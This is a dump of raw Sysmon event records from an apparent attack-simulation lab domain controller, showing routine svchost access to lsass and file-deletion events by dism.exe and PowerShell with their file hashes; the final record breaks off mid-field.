10341000x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94AF41A42A6C8735FE0054B749CF2B6A,SHA256=4C805619C163C2B26C14BF10FC66FCEF400CD59DEA55C2E86BB12FCF1C5315D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.371{266CAFBE-6435-6064-B802-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.340{266CAFBE-6435-6064-B902-00000000AD01}4732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.528{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\WimProvider.dllMD5=1B0C7DFB2240BA004B37904073624DB3,SHA256=F2C7DB522DDE968EDF49B03BC10978AAC4C42C745CA4A474627E8CEBBCEBB00A,IMPHASH=20D31D66F56B810094B1AA564C92009Dtruetrue 23542300x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.512{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\VhdProvider.dllMD5=F37C8F5BF852151D9BF085687A8DEC6D,SHA256=6CDFC95C2F2ED3695D5EE8CF4367A6C7FB5707DA3C234CEE8FA8C1BBDE426DE7,IMPHASH=3CA997A1A0BD38B850B18DAED5E948DEtruetrue 23542300x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.512{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\UnattendProvider.dllMD5=3DB4777B76FC1973A61754FAEC348981,SHA256=29A4C7379E5A0A7532C90B5ACE0DD99AB5311D03CC0BA6A4BCFB410D7D8B01AE,IMPHASH=4FA75E8720452554D61C8AC5FD64C43Ftruetrue 23542300x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.512{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\TransmogProvider.dllMD5=5E82E2B7CFF045C7CDA8E33EAB186402,SHA256=0038B82E999C3DEF3980D39A8CAED9EA6B52A4FC9EF58BF3B3F5FC91F7748112,IMPHASH=7746C0E3C7D3763C5F13C90D4934087Btruetrue 23542300x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.496{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\SmiProvider.dllMD5=C5C7A9E3121B91E51ECFBA6FB2985044,SHA256=FB519B9EEF4C3344D58C768BD3AD7ADCB0677EA7B998056B6A13620CB9E61412,IMPHASH=03C38376DA7CCE75E82EECACADA0EA03truetrue 23542300x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.496{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\ProvProvider.dllMD5=5077063311C5708318C5FA3E255011ED,SHA256=97FA95102B6ACF00C70F140EE9FA4A73A6BE7C03E0F0D99AE58DB5E492CD0ECA,IMPHASH=D8DD764BFC0F1D9E403714D169018B83truetrue 23542300x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.496{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\OSProvider.dllMD5=4868187A2F176074DB7F35E356F74D4F,SHA256=84C8C4C67C808871A278254304D985533F67D44391840F43674FC829014E1B60,IMPHASH=82A4D833A82D441391A9AA3027199337truetrue 23542300x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\OfflineSetupProvider.dllMD5=86B7E8438B1125C479FD275B1BDDB9A7,SHA256=47FAF8671B25A30D7BCC47AD35926D70DB633A181FA6C276479B4408A526E63E,IMPHASH=B8B4A188EFC4F12D33591C6D319B6F12truetrue 23542300x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\MsiProvider.dllMD5=EA19239A85416A488360FA564D312402,SHA256=F21591336CD1A24EE941827620405FA34414C1C349216B4B8083ECD1FFF17C29,IMPHASH=33E1132923056DDEFB0521726DA5B987truetrue 23542300x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\LogProvider.dllMD5=F7DB4F104DBB56DF5A156E7329E80112,SHA256=7C67EFAF44D1413576B4575B1A4C975BCB10B64BEF13E6756E895D4DB9E61AA2,IMPHASH=FB695172E8A76C56E97CE435F8ED0220truetrue 23542300x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\IntlProvider.dllMD5=0082903881275179642AE83EFA720310,SHA256=7CCF1625E6FBE4DB16F12AC037E4236A3EF269DEE47A157C68374C867941F9E8,IMPHASH=CFB81BC5FF922F23D605A653700FE666truetrue 23542300x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\ImagingProvider.dllMD5=EEB4AA36BAD26A2C6216A1FF3439B58C,SHA256=44A6679425039DC870C297294C4B3323F6FA9DE5C7D16D7D0AB7E1254AFC75D3,IMPHASH=0264D9B4BFE54732ADF0E29BC73BF280truetrue 23542300x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\IBSProvider.dllMD5=11DE34FCDB75E79A920D3B491F3E7BF0,SHA256=6B7C7AD8B1AD522B27B2CC5E4F76F56ADE4495D7D46CE4F997A68954F072AF17,IMPHASH=C755896FA14213058E34639A28868FBCtruetrue 23542300x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.481{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\GenericProvider.dllMD5=397ED660129D40927A27B75A4B8FAE2E,SHA256=EAFCECFE911DABB4531E1331DDF2E119DCBB6B7A887D70BDE737EA76BE10EB74,IMPHASH=F55EE75573C110804DE5E50ACEEC1B06truetrue 23542300x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\FolderProvider.dllMD5=6428B4D0C26DB23E9478F039891CD5C9,SHA256=55126BB099785C2F9CD32A30991082C47D62C8231D570A9D8A6F3CC599B25EE1,IMPHASH=B2CC5EDD42A866F7CB6CAE42DB969187truetrue 23542300x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\FfuProvider.dllMD5=E27BC7F808E72F08372BA3C40B4B6344,SHA256=927B194432046C0D2ADF7C7B71E4BE85602C4D00A5D6EDA9F9DB9924E1C3447A,IMPHASH=8580AF5C1871319D05329DB2E96A8146truetrue 23542300x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\WimProvider.dll.muiMD5=CC3B15540DDB521A300BAFF0BF4F902E,SHA256=33C06CC037DF1EBB72A15BCC2E09BC89DFEF7DD94441C650FD3D0C833122002A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\VhdProvider.dll.muiMD5=10536C56F02E68EBD13D0B2CE8665C6A,SHA256=06C3B71D251A8DD47D02EDBFBE84E0B6B1D67956DE4D3996031434CBAD728929,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\UnattendProvider.dll.muiMD5=B7E3676672BE6851EA13ADD879C2945E,SHA256=2D2D82EE842CD346B58DCAFAE6FEC46D491E0D15CFBE0D8964A4AB7F18C5AAB9,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\TransmogProvider.dll.muiMD5=D5D596B1102DA565C2ED1FAAC170E758,SHA256=B5DBB36E947FD64AAF22C53F0A9634C7D72D4CC270C055B67E020920BF806909,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\SmiProvider.dll.muiMD5=CAD746ED5AF63E7FC49ED4A5A3984629,SHA256=016C6071B04E6D7E12AD9B8A85C002320331E01ED62922C573A1AC43BA0DD919,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\ProvProvider.dll.muiMD5=70AFEC86B6CF677BF8D3C713CA3281FB,SHA256=C8579EC95A51EB663FFC6145F0998C2F1930A6B8146C84C0A9094BCA4E5195A7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\OSProvider.dll.muiMD5=A464DFEDEA8520616AA9B2ACD166A77F,SHA256=54E985CFF256CEBE82E9EF3E814A5FDA9FF730BCB50265E9BA78DE65A4DE3F42,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\OfflineSetupProvider.dll.muiMD5=CED788DBD9D13D0490B2F642B0B051F6,SHA256=D5DBC0A52B598800EE14569859383525950B865F4816E47E2E73F79AA1C32A09,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\MsiProvider.dll.muiMD5=5AE9ABD6BB469F3AD7B3A4CCD40974BF,SHA256=C2CE66F2F218890AA76F8BAB68B4C0FDCED0688E694F912F3A5BFABFA6CDB5E7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\LogProvider.dll.muiMD5=0D4519BC8EB58A006E4A5EB993C0DCCF,SHA256=DAFFE67521F9B4657FBFEF9585234CB39293F9B866C0D97D66F675037515BB51,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\IntlProvider.dll.muiMD5=16ACB74928BC55FD4AAC316F3B92E1D7,SHA256=17CB486CADB679C75A27BA6C76E2FE714F4B8DA845E6F795759517D6734F0BC9,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\ImagingProvider.dll.muiMD5=26F5BBF8D6EE90B4F47C18E93D1087FB,SHA256=F41738FEF7140176447ECF371B1117A485E48BA6F3E9AFAA8C4F883ABFAE62DA,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\IBSProvider.dll.muiMD5=0B09FE334215A8E736B2CF08A50D5204,SHA256=DCE9AD3B79F91BEBEDDFCD9E03F1557CB7C6114AC906081E9E046F807093CDF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.465{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\GenericProvider.dll.muiMD5=956B8B45B92321C0D5975EE9A6C5B773,SHA256=578541D71466CF61EF399023B34EDFCBD915142BE856534AD4D17D25E7CC9F3D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\FolderProvider.dll.muiMD5=DC4E4C2800DC6D98F7893044A21D246B,SHA256=8B4CE62F4E4294E701193C7AE393EB5EB29AA45932D376CB1A03728A140096AE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\FfuProvider.dll.muiMD5=5ECAD70AC2B3A95CBB42D6FE67D2F726,SHA256=C210389DBB9B7B4A802E4B0C3C708B6F55B086564A01E19CFB183B6AF916C30A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\DmiProvider.dll.muiMD5=38C2A1560C340537C3AE0CE04BDF7EAA,SHA256=52B06DFD85FB5AB1DCE2BE665CA144B1AE6658F518D1623D9B44C347C482B064,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\DismProv.dll.muiMD5=BD7B77B3EE9A12FF3F5446ECDF80B5C6,SHA256=B972A0B2C4682E9074441B481BD886DE19B8DB3DBA401B88E980B154C14D5A7E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\DismCore.dll.muiMD5=C901FF639EDFBBE710D6E5882F07CD24,SHA256=9BDA61D23DC50F9AFA82DA94B06B7B9C8229D5ED666D2F5270DAE13100815C27,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\CompatProvider.dll.muiMD5=A2A344CB32B6835744A36D877C952665,SHA256=A74D765B796638A921C4810D1712A08F7A37C9BA9E91F4DFDCB9727611C3D18D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\CbsProvider.dll.muiMD5=179B34BE97A383AF3E757031E7DA964B,SHA256=ABD3824664D1336EE849D89BA178606CC1B1E23E173752D8093F34A5580FA8F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\AssocProvider.dll.muiMD5=386FE7AC95738A0CB6D25DEA662991F1,SHA256=22DC7317108A528BA92C853330598F628B93FFF27CAC34C2F501B806A75261D9,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\en-US\AppxProvider.dll.muiMD5=9FF5081115C2C21D9F85AF7EE6D2CC63,SHA256=107B10A8C1426F1C0D703F06832D740A4CFDCAA596FA0EA147A32A736A7A2A4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DmiProvider.dllMD5=FC76385FF00D4A93618D842B41716D8D,SHA256=BBD49A49CFFA8411FFA91B02541F5F3B5333FD9055BC129DDD3B36EB005C34D9,IMPHASH=062B279D8ED4374A0CD0C84620F4BE4Etruetrue 23542300x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismProv.dllMD5=8C7D97E22045AE402EA896F514CEED81,SHA256=76D3202E11BA22D277532A14CAE60E596975C0D8C34C7BE154F453EB1F7C37EF,IMPHASH=0247CB1C8FD55E43A448E359883057DBtruetrue 23542300x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.449{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismHost.exeMD5=A59C22B77871CC18970038B7FA43826F,SHA256=CB84B51713BAD689ABB96560E57A71B276D4B28B1C09C7116EE85F5782A1B144,IMPHASH=734010D3430DBD2CA51B599924FE1424truetrue 23542300x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismCorePS.dllMD5=FB88731B484D1FF4AFF5DB75A20799FA,SHA256=EA155388211E0C3CEF2C99BD5F341C9F93F1ECDA6F21096DB6F9DB2110686A52,IMPHASH=65E10DCEA11F7117C161DC7557B87689truetrue 23542300x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\DismCore.dllMD5=F1AB58CACD95921A04225222D03CDEA0,SHA256=EDE89F377FD46F95639413411CDA072D9FF63E72A399B26AB4870094F145091B,IMPHASH=B7B56C790C8AB7134B0680D8DFE46658truetrue 23542300x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 